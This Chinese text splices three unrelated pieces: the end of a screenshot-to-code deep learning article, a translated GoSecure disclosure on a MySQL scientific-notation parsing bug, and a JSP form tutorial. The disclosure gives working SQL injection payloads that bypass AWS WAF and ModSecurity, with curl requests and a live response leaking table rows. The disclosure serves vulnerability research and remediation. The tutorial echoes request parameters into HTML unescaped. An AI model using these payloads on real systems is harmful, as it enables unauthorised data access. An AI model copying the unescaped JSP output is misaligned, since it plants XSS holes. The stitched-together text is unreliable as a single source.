试验时使用轻量级的模型。用 GRU 替换 LSTM 可以让每个 epoch 的时间减少 30%,而且不会对性能有太大影响。
下一步
深度学习很适合应用在前端开发中,因为很容易生成数据,而且如今的深度学习算法可以覆盖绝大多数的逻辑。
其中一个最有意思的方面是在 LSTM 中使用 attention 机制[16]。它不仅能提高准确率,而且可以帮助我们观察 CSS 在生成 HTML 代码的时候,它的注意力在何处。
Attention 还是 HTML 代码、样式表、脚本甚至后台之间沟通的关键因素。attention 层可以追踪参数,帮助神经网络在不同编程语言之间沟通。
但是短期内,最大的难题还在于找到一个可扩展的方法用于生成数据。这样才能逐步加入字体、颜色、单词以及动画。
迄今为止,很多人都在努力实现绘制草图并将其转化为应用程序的模板。不出两年,我们就能实现在纸上绘制应用程序,并在一秒内获得相应的前端代码。Airbnb 设计团队[17]和 Uizard[18] 已经创建了两个原型。
下面是一些值得尝试的实验。
实验
Getting started:
运行所有的模型
尝试不同的超参数
尝试不同的 CNN 架构
加入 Bidirectional 的 LSTM 模型
使用不同的数据集实现模型[19](你可以通过 FloydHub 的参数“--data ”挂载这个数据集:emilwallner/datasets/100k-html:data)
高级实验
创建能利用特定的语法稳定生成任意应用程序/网页的生成器
生成应用程序模型的设计图数据。将应用程序或网页的截图自动转换成设计,并使用 GAN 产生变化。
通过 attention 层观察每次预测时的图像焦点,类似于这个模型:https://arxiv.org/abs/1502.03044
创建模块化方法的框架。比如一个模型负责编码字体,一个负责颜色,另一个负责布局,并利用解码部分将它们结合在一起。你可以从静态图像特征开始尝试。
为神经网络提供简单的 HTML 组成单元,训练它利用 CSS 生成动画。如果能加入 attention 模块,观察输入源的聚焦就更完美了。
最后,非常感谢 Tony Beltramelli 和 Jon Gold 提供的研究成果和想法,以及对各种问题的解答。谢谢 Jason Brownlee 贡献他的 stellar Keras 教程(我在核心的 Keras 实现中加入了几个他的教程中介绍的 snippets),谢谢 Beltramelli 提供的数据。还要谢谢 Qingping Hou、Charlie Harrington、 Sai Soundararaj、 Jannes Klaas、 Claudio Cabral、 Alain Demenet 和 Dylan Djian 审阅本篇文章。
相关链接
[1] pix2code 论文:https://arxiv.org/abs/1705.07962
[2] sketch2code:https://airbnb.design/sketching-interfaces/
[3] https://github.com/emilwallner/Screenshot-to-code-in-Keras/blob/master/README.md
[4] https://www.floydhub.com/emilwallner/projects/picturetocode
[5] https://machinelearningmastery.com/blog/page/2/
[6] https://blog.floydhub.com/my-first-weekend-of-deep-learning/
[7] https://blog.floydhub.com/coding-the-history-of-deep-learning/
[8] https://blog.floydhub.com/colorizing-b&w-photos-with-neural-networks/
[9] https://machinelearningmastery.com/deep-learning-caption-generation-models/
[10] https://machinelearningmastery.com/how-to-one-hot-encode-sequence-data-in-python/
[11] https://www.youtube.com/watch?v=byLQ9kgjTdQ&t=21s
[12] https://arxiv.org/abs/1301.3781
[13] https://github.com/tonybeltramelli/pix2code/tree/master/datasets
[14] https://iamtrask.github.io/2015/11/15/anyone-can-code-lstm/
[15] https://en.wikipedia.org/wiki/BLEU
[16] https://arxiv.org/pdf/1502.03044.pdf
[17] https://airbnb.design/sketching-interfaces/
[18] https://www.uizard.io/
[19] http://lstm.seas.harvard.edu/latex/
GoSecure道德黑客在MySQL中发现了一个具有安全问题的漏洞。该问题产生的后果是,AWS Web应用程序防火墙(AWS Web Application Firewall,WAF)客户对SQL注入失去保护。我们的研究团队进一步证实modsecurity也会受其影响,但正如本博客所述,保护是可以实现的。
问题发现
2013年,Roberto Salgado在BlackHat上发表了一篇题为“SQLi优化与混淆技术”的演讲,介绍了SQL注入的多种绕行技术,其中包括针对MySQL和MariaDB的技术。2018年,GoSecure道德黑客重提了该演示文稿,并开始在本地使用MySQL和MariaDB进行一些测试。我们发现在那篇演讲中提到的科学记数法漏洞,会产生比看上去更为严重的后果。事实证明,用它可以完成一些美妙的事情——从攻击者的角度来看是美妙的。这个漏洞允许SQL语法保持有效,即使它不该有效,给安全防御造成混乱。
科学记数法,特别是e符号,已经被集成到许多编程语言中,包括SQL。不清楚是否所有SQL都这样实现,但它是MySQL/MariaDB实现的一部分。下面是一个集成到SQL查询中的科学记数法示例。这实际上是2013年BlackHat演示中的一个。e符号将被忽略,因为它被用于无效的上下文中。
SELECT table_name FROM information_schema 1.e.tables
因此,实际上该查询的行为与以下相同:
SELECT table_name FROM information_schema .tables
通过几项测试,我们发现可以在关键字“1.e”后面加上以下字符:
( ) . , | & % * ^ /
为了说明这个问题,我们将使用下面的示例数据集来演示:
mysql> describe test;
+-------+--------------+------+-----+---------+-------+
| Field | Type | | Key | Default | Extra |
+-------+--------------+------+-----+---------+-------+
| id | int | YES | | | |
| test | varchar(255) | YES | | | |
+-------+--------------+------+-----+---------+-------+
2 rows in set (0.01 sec)
mysql> select id, test from test;
+------+-----------+
| id | test |
+------+-----------+
| 1 | admin |
| 2 | usertest1 |
| 3 | usertest2 |
+------+-----------+
3 rows in set (0.00 sec)
让我们看看关键字“1.e”和该关键字后面的字符可以实现什么效果:
mysql> select id 1.1e, char 10.2e(id 2.e), concat 3.e('a'12356.e,'b'1.e,'c'1.1234e)1.e, 12 1.e*2 1.e, 12 1.e/2 1.e, 12 1.e|2 1.e, 12 1.e^2 1.e, 12 1.e%2 1.e, 12 1.e&2 from test 1.e.test;
+------+----------------------------------------+------------------------------------------+----------+----------+----------+----------+----------+----------+
| id | char 10.2e(id 2.e) | concat 3.e('a'12356.e,'b'1.e,'c'1.1234e) | 12 1.e*2 | 12 1.e/2 | 12 1.e|2 | 12 1.e^2 | 12 1.e%2 | 12 1.e&2 |
+------+----------------------------------------+------------------------------------------+----------+----------+----------+----------+----------+----------+
| 1 | 0x01 | abc | 24 | 6.0000 | 14 | 14 | 0 | 0 |
| 2 | 0x02 | abc | 24 | 6.0000 | 14 | 14 | 0 | 0 |
| 3 | 0x03 | abc | 24 | 6.0000 | 14 | 14 | 0 | 0 |
+------+----------------------------------------+------------------------------------------+----------+----------+----------+----------+----------+----------+
3 rows in set (0.00 sec)
上述查询等价于以下查询:
mysql> select id, char(id), concat('a','b','c'), 12*2, 12/2, 12|2, 12^2, 12%2, 12&2 from test.test;
+------+--------------------+---------------------+------+--------+------+------+------+------+
| id | char(id) | concat('a','b','c') | 12*2 | 12/2 | 12|2 | 12^2 | 12%2 | 12&2 |
+------+--------------------+---------------------+------+--------+------+------+------+------+
| 1 | 0x01 | abc | 24 | 6.0000 | 14 | 14 | 0 | 0 |
| 2 | 0x02 | abc | 24 | 6.0000 | 14 | 14 | 0 | 0 |
| 3 | 0x03 | abc | 24 | 6.0000 | 14 | 14 | 0 | 0 |
+------+--------------------+---------------------+------+--------+------+------+------+------+
3 rows in set (0.00 sec)
太疯狂了,对吧?让我们看一下如何在真实产品中利用此漏洞。
应该注意的是,关键字“1.e”中的数字并不重要。任何数字都可以介于点和“e”之间,并且点是强制性的(例如,“1337.1337e”也可行)。
滥用漏洞绕过AWS Web应用程序防火墙(WAF)
Amazon Web Services(AWS)有一个名为CloudFront的产品,它可以与AWS WAF相结合,并具有预定义的规则,以帮助公司保护其Web应用程序免受入侵。然而,在一次接触中,我们发现AWS WAF中的“SQL数据库”规则可以绕过上一节中显示的漏洞。
一个简单的查询可以显示WAF会阻止使用著名的 1'或'1'='1 注入来请求:
$ curl -i -H "Origin: http://my-domain" -X POST \
"http://d36bjalk0ud0vk.cloudfront.net/index.php" -d "x=1' or '1'='1"
HTTP/1.1 403 Forbidden
Server: CloudFront
Date: Wed, 21 Jul 2021 21:38:16 GMT
Content-Type: text/html
Content-Length: 919
Connection: keep-alive
X-Cache: Error from cloudfront
Via: 1.1 828380fdf2467860fea66d7412803418.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: YUL62-C1
X-Amz-Cf-Id: eh5LR9w1Cjccxf5JAZ4yTkrsILZL3PLjqwCQbBUD_zakHi53NPCJrg==
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<TITLE>ERROR: The request could not be satisfied</TITLE>
</HEAD><BODY>
<H1>403 ERROR</H1>
<H2>The request could not be satisfied.</H2>
<HR noshade size="1px">
Request blocked.
We can't connect to the server for this app or website at this time. There might be too much traffic or a configuration error. Try again later, or contact the app or website owner.
<BR clear="all">
If you provide content to customers through CloudFront, you can find steps to troubleshoot and help prevent this error by reviewing the CloudFront documentation.
<BR clear="all">
<HR noshade size="1px">
<PRE>
Generated by cloudfront (CloudFront)
Request ID: eh5LR9w1Cjccxf5JAZ4yTkrsILZL3PLjqwCQbBUD_zakHi53NPCJrg==
</PRE>
<ADDRESS>
</ADDRESS>
</BODY></HTML>
现在我们看,如果我们在这个简单的注入中使用科学记数法,利用这个漏洞会发生什么:
$ curl -i -H "Origin: http://my-domain" -X POST \
"http://d36bjalk0ud0vk.cloudfront.net/index.php" -d "x=1' or 1.e(1) or '1'='1"
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 32
Connection: keep-alive
Date: Wed, 21 Jul 2021 21:38:23 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Cache: Miss from cloudfront
Via: 1.1 eae631604d5db564451a93106939a61e.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: YUL62-C1
X-Amz-Cf-Id: TDwlolP9mvJGtcwB5vBoUGr-JRxzcX-ZLuumG9F4vioKl1L5ztPwUw==
1 admin
2 usertest1
3 usertest2
仅上述绕过的证据就足以激发我们对该漏洞工作原因和方式的兴趣,以便正确地披露该漏洞,并向相关方展示其对安全性的影响。
漏洞调查
起初,我们没有向MySQL和MariaDB透露这个漏洞,因为我们没有看到它的影响。在我们发现WAF绕行之前,它不会以任何方式影响数据,也不会让你的权限升级。现在我们找到了一个具体的安全影响,让我们了解一下这个漏洞是如何产生的,以及为什么它会这样。
请记住,以下解释特意保持简明扼要。
首先,MySQL和MariaDB通过在查询中查找标记来工作,如数字、字符串、注释、行尾等。一旦代码认为它知道是什么类型的标记,就会通过发送正确的函数来解析该标记。
其次,我们要查看的代码段是整数或实数解析器,因为代码将首先到达该段:
case MY_LEX_INT_OR_REAL: // Complete int or incomplete real
if (c != '.') { // Found complete integer number.
yylval->lex_str = get_token(lip, 0, lip->yyLength());
return int_token(yylval->lex_str.str, (uint)yylval->lex_str.length);
} // fall through
第三,代码将通过实数函数找到一个点,这就是我们想要了解的代码:
case MY_LEX_REAL: // Incomplete real number
while (my_isdigit(cs, c = lip->yyGet()))
;
if (c == 'e' || c == 'E') {
c = lip->yyGet();
if (c == '-' || c == '+') c = lip->yyGet(); // Skip sign
if (!my_isdigit(cs, c)) { // No digit after sign
state = MY_LEX_CHAR;
break;
}
while (my_isdigit(cs, lip->yyGet()))
;
yylval->lex_str = get_token(lip, 0, lip->yyLength());
return (FLOAT_NUM);
}
yylval->lex_str = get_token(lip, 0, lip->yyLength());
return (DECIMAL_NUM);
此时,代码已经处理了点之前的数字,并开始获取点之后的所有数字。然后,条件验证该字符是“e”或“E”,然后获取下一个字符。如果该字符不是数字,则将状态设置为“MY_LEX_CHAR”,然后使用“break”运算符结束switch语句,该运算符返回到switch case的开头。
最后,到达以下case语句,在这里,标记被完全遗忘并从查询中删除:
case MY_LEX_CHAR: // Unknown or single char token
case MY_LEX_SKIP: // This should not happen
if (c == '-' && lip->yyPeek() == '-' &&
(my_isspace(cs, lip->yyPeekn(1)) ||
my_iscntrl(cs, lip->yyPeekn(1)))) {
state = MY_LEX_COMMENT;
break;
}
if (c == '-' && lip->yyPeek() == '>') // '->'
{
lip->yySkip();
lip->next_state = MY_LEX_START;
if (lip->yyPeek() == '>') {
lip->yySkip();
return JSON_UNQUOTED_SEPARATOR_SYM;
}
return JSON_SEPARATOR_SYM;
}
if (c != ')') lip->next_state = MY_LEX_START; // Allow signed numbers
/*
Check for a placeholder: it should not precede a possible identifier
because of binlogging: when a placeholder is replaced with its value
in a query for the binlog, the query must stay grammatically correct.
*/
if (c == '?' && lip->stmt_prepare_mode && !ident_map[lip->yyPeek()])
return (PARAM_MARKER);
return ((int)c);
我们通过阅读注释“Unknown or single CHAR token”可知,此时MySQL并不知道该怎么处理标记,而“MY_LEX_CHAR”条件只是简单地下传到“MY_LEX_SKIP”条件。在“MY_LEX_SKIP”的条件下,函数将以返回字符结束。需要注意的一点是,如果字符不是右括号,则状态被设置为“MY_LEX_START”,这将从一个新标记开始。无论哪种方式,即使它以一个右括号结束,仍然不会返回标记,因此它会被丢弃。
候选修正方案
候选修正方案很简单,比如在标记不正确时中止查询,而不是让它通过。当MySQL或MariaDB找到浮点标记的开头,并且浮点标记后面没有数字时,它应该中止查询。
if (c == 'e' || c == 'E') {
c = lip->yyGet();
if (c == '-' || c == '+') c = lip->yyGet(); // Skip sign
if (!my_isdigit(cs, c)) { // No digit after sign
return (ABORT_SYM); // <--- Fix here!
}
while (my_isdigit(cs, lip->yyGet()))
;
yylval->lex_str = get_token(lip, 0, lip->yyLength());
return (FLOAT_NUM);
}
我们向MySQL和MariaDB项目提交了修复程序。注意,这不是我们常做的事情,因为项目维护人员通常更适合修复安全问题。然而在本例中,由于这在MySQL/MariaDB中本身不是一个安全问题,因此我们认为提供修复程序将增加快速解决问题的机会。此外,我个人对浏览大型C/C++代码库以发现问题所在很感兴趣。
带有安全隐患的漏洞
如前所述,此问题的安全影响不在MySQL和MariaDB的控制范围内。任何WAF或类似的安全产品,如果忽略像这样形成的SQL请求,都将容易受到攻击。情况很复杂。如果请求是畸形的,安全产品自然不会认为它们是有效的SQL,从而使它们不需要阻止。
什么是ModSecurity
我们首先在AWS WAF上发现了这个漏洞并报告了它。然而,我们后来决定评估ModSecurity,它是Apache和nginx的流行WAF。ModSecurity捆绑了libinjection,我们也发现它受到这个混淆漏洞的影响。
这里演示了modsecurity阻止恶意SQL注入模式的能力。检测结果显示,返回一个被禁止的页面。
modsecurity(使用libinjection)正在阻止SQL注入
crs_1 | 192.168.208.1 - - [08/Oct/2021:19:28:09 +0000] "GET /index.php?genre=action%27%20or%20%27%27=%27 HTTP/1.1" 403 199
crs_1 | [Fri Oct 08 19:28:40.345633 2021] [:error] [pid 218:tid 140514141660928] [client 192.168.208.1:49958] [client 192.168.208.1] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&sos' [file "/etc/modsecurity.d/owasp-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "65"] [id "942100"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: s&sos found within ARGS:genre: action' or ''='"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.2"] [tag "modsecurity"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/152/248/66"] [tag "PCI/6.5.2"] [hostname "localhost"] [uri "/index.php"] [unique_id "YWCb6EwweO7WZjrKg6GHTgAAAMk"]
modsecurity日志高亮显示已触发libinjection
我们可以通过在字面表达式前加上科学记数法“1.e”来规避这种做法。Libinjection在内部标记参数并标识上下文节类型,如注释和字符串。Libinjection将字符串“1.e”视为一个未知的SQL关键字,并得出结论,它更可能是一个英语句子,而不是代码。当libinjection不识别SQL函数时,同样的行为也会出现。
modsecurity和libinjection绕行演示
当我们联系OWASP核心规则集(Core Rule Set,CRS)安全团队时,他们表示,如果规则集配置偏执级别至少为2级,则可以提供有效的保护,这是检测混淆攻击的建议。
时间线
2021-02-11:作为约定的一部分,通过AWS WAF滥用漏洞
2021-08-16:向亚马逊披露滥用此漏洞的WAF绕行
2021-09-29:请求状态更新
2021-10-01:AWS表示问题已经解决
2021-10-01:发现ModSecurity/libinjection也受到影响
2021-10-04:确认AWS WAF修复
2021-10-04:将候选补丁发送到MySQL和MariaDB
2021-10-05:通过OWASP核心规则集项目(CRS)向ModSecurity/libinjection披露
2021-10-05:确认ModSecurity/libinjection中的2级偏执解决方案
2021-10-19:公开披露
结论
这个安全问题与其它许多问题不同,因为它很容易被轻视为一个简单的解析器错误。我们很高兴AWS了解了这一风险,并决定在WAF中解决这一问题,特别是因为这是一种我们以前从未见过的,使亚马逊客户可能无法得到保护的奇怪情况。
希望从长远来看,MySQL和MariaDB能够修复这个bug,10年后我们将能够从WAF中删除这种奇怪的解析器行为。
特别感谢Philippe Arteau,他对ModSecurity/libinjection进行了额外的测试。
原文链接:https://www.gosecure.net/blog/2021/10/19/a-scientific-notation-bug-in-mysql-left-aws-waf-clients-vulnerable-to-sql-injection/
本文由CSDN组织翻译,转载请注明来源及出处!
我们在浏览网页的时候,经常需要向服务器提交信息,并让后台程序处理。浏览器中使用 GET 和 POST 方法向服务器提交数据。
GET 方法
GET方法将请求的编码信息添加在网址后面,网址与编码信息通过"?"号分隔。如下所示:
http://www.runoob.com/hello?key1=value1&key2=value2
GET方法是浏览器默认传递参数的方法,一些敏感信息,如密码等建议不使用GET方法。
用get时,传输数据的大小有限制 (注意不是参数的个数有限制),最大为1024字节。
POST 方法
一些敏感信息,如密码等我们可以通过POST方法传递,POST提交数据是隐式的。
POST提交数据是不可见的,GET是通过在url里面传递的(可以看一下你浏览器的地址栏)。
JSP使用getParameter()来获得传递的参数,getInputStream()方法用来处理客户端的二进制数据流的请求。
JSP 读取表单数据
getParameter(): 使用 request.getParameter() 方法来获取表单参数的值。
getParameterValues(): 获得如checkbox类(名字相同,但值有多个)的数据。 接收数组变量 ,如checkbox类型
getParameterNames():该方法可以取得所有变量的名称,该方法返回一个Emumeration。
getInputStream():调用此方法来读取来自客户端的二进制数据流。
使用URL的 GET 方法实例
以下是一个简单的URL,并使用GET方法来传递URL中的参数:
http://localhost:8080/testjsp/main.jsp?name=菜鸟教程&url=http://ww.runoob.com
testjsp 为项目地址。
以下是 main.jsp 文件的JSP程序用于处理客户端提交的表单数据,我们使用getParameter()方法来获取提交的数据:
<%@ page language="java" contentType="text/html; charset=UTF-8"
pageEncoding="UTF-8"%>
<%@ page import="java.io.*,java.util.*" %>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>菜鸟教程(runoob.com)</title>
</head>
<body>
<h1>使用 GET 方法读取数据</h1>
<ul>
<li><p><b>站点名:</b>
<%= request.getParameter("name")%>
</p></li>
<li><p><b>网址:</b>
<%= request.getParameter("url")%>
</p></li>
</ul>
</body>
</html>
接下来我们通过浏览器访问 http://localhost:8080/testjsp/main.jsp?name=菜鸟教程&url=http://ww.runoob.com 输出结果如下所示:
使用表单的 GET 方法实例
以下是一个简单的 HTML 表单,该表单通过GET方法将客户端数据提交 到 main.jsp 文件中:
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>菜鸟教程(runoob.com)</title>
</head>
<body>
<form action="main.jsp" method="GET">
站点名: <input type="text" name="name">
<br />
网址: <input type="text" name="url" />
<input type="submit" value="提交" />
</form>
</body>
</html>
将以上HTML代码保存到test.htm文件中。 将该文件放置于当前jsp项目的 WebContent 目录下(与 main.jsp 同一个目录)。
通过访问 http://localhost:8080/testjsp/test.html 提交表单数据到 main.jsp 文件,演示 Gif 图如下所示:
在 "站点名" 与 "网址" 两个表单中填入信息,并点击 "提交" 按钮,它将输出结果。
使用表单的 POST 方法实例
接下来让我们使用POST方法来传递表单数据,修改main.jsp与Hello.htm文件代码,如下所示:
main.jsp文件代码:
<%@ page language="java" contentType="text/html; charset=UTF-8"
pageEncoding="UTF-8"%>
<%@ page import="java.io.*,java.util.*" %>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>菜鸟教程(runoob.com)</title>
</head>
<body>
<h1>使用 POST 方法读取数据</h1>
<ul>
<li><p><b>站点名:</b>
<%
// 解决中文乱码的问题
String name = new String((request.getParameter("name")).getBytes("ISO-8859-1"),"UTF-8");
%>
<%=name%>
</p></li>
<li><p><b>网址:</b>
<%= request.getParameter("url")%>
</p></li>
</ul>
</body>
</html>
代码中我们使用 new String((request.getParameter("name")).getBytes("ISO-8859-1"),"UTF-8")来转换编码,防止中文乱码的发生。
以下是test.htm修改后的代码:
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>菜鸟教程(runoob.com)</title>
</head>
<body>
<form action="main.jsp" method="POST">
站点名: <input type="text" name="name">
<br />
网址: <input type="text" name="url" />
<input type="submit" value="提交" />
</form>
</body>
</html>
通过访问 http://localhost:8080/testjsp/test.html 提交表单数据到 main.jsp 文件,演示 Gif 图如下所示:
传递 Checkbox 数据到JSP程序
复选框 checkbox 可以传递一个甚至多个数据。
以下是一个简单的HTML代码,并将代码保存在test.htm文件中:
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>菜鸟教程(runoob.com)</title>
</head>
<body>
<form action="main.jsp" method="POST" target="_blank">
<input type="checkbox" name="google" checked="checked" /> Google
<input type="checkbox" name="runoob" /> 菜鸟教程
<input type="checkbox" name="taobao" checked="checked" />
淘宝
<input type="submit" value="选择网站" />
</form>
</body>
</html>
以上代码在浏览器访问如下所示:
以下为main.jsp文件代码,用于处理复选框数据:
<%@ page language="java" contentType="text/html; charset=UTF-8"
pageEncoding="UTF-8"%>
<%@ page import="java.io.*,java.util.*" %>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>菜鸟教程(runoob.com)</title>
</head>
<body>
<h1>从复选框中读取数据</h1>
<ul>
<li><p><b>Google 是否选中:</b>
<%= request.getParameter("google")%>
</p></li>
<li><p><b>菜鸟教程是否选中:</b>
<%= request.getParameter("runoob")%>
</p></li>
<li><p><b>淘宝是否选中:</b>
<%= request.getParameter("taobao")%>
</p></li>
</ul>
</body>
</html>
通过访问 http://localhost:8080/testjsp/test.html 提交表单数据到 main.jsp 文件,演示 Gif 图如下所示:
读取所有表单参数
以下我们将使用 HttpServletRequest 的 getParameterNames() 来读取所有表单参数,该方法可以取得所有变量的名称,该方法返回一个枚举。
一旦我们有了一个 Enumeration(枚举),我们就可以调用 hasMoreElements() 方法来确定是否还有元素,以及使用nextElement()方法来获得每个参数的名称。
<%@ page language="java" contentType="text/html; charset=UTF-8"
pageEncoding="UTF-8"%>
<%@ page import="java.io.*,java.util.*" %>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>菜鸟教程(runoob.com)</title>
</head>
<body>
<h1>读取所有表单参数</h1>
<table width="100%" border="1" align="center">
<tr bgcolor="#949494">
<th>参数名</th><th>参数值</th>
</tr>
<%
Enumeration paramNames = request.getParameterNames();
while(paramNames.hasMoreElements()) {
String paramName = (String)paramNames.nextElement();
out.print("<tr><td>" + paramName + "</td>\n");
String paramValue = request.getParameter(paramName);
out.println("<td> " + paramValue + "</td></tr>\n");
}
%>
</table>
</body>
</html>
以下是test.htm文件的内容:
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>菜鸟教程(runoob.com)</title>
</head>
<body>
<form action="main.jsp" method="POST" target="_blank">
<input type="checkbox" name="google" checked="checked" /> Google
<input type="checkbox" name="runoob" /> 菜鸟教程
<input type="checkbox" name="taobao" checked="checked" />
淘宝
<input type="submit" value="选择网站" />
</form>
</body>
</html>
现在我们通过浏览器访问 test.htm 文件提交数据,输出结果如下:
通过访问 http://localhost:8080/testjsp/test.html 提交表单数据到 main.jsp 文件,演示 Gif 图如下所示:
你可以尝试使用以上的JSP代码读取其它对象,如文本框,单选按钮或下拉框等等其他形式的数据。
如您还有不明白的可以在下面与我留言或是与我探讨QQ群308855039,我们一起飞!
*请认真填写需求信息,我们会在24小时内与您取得联系。